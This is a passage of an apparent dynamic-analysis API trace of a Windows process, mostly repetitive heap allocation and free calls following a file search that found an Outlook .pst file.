ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0096.242] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.242] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.242] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.242] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap 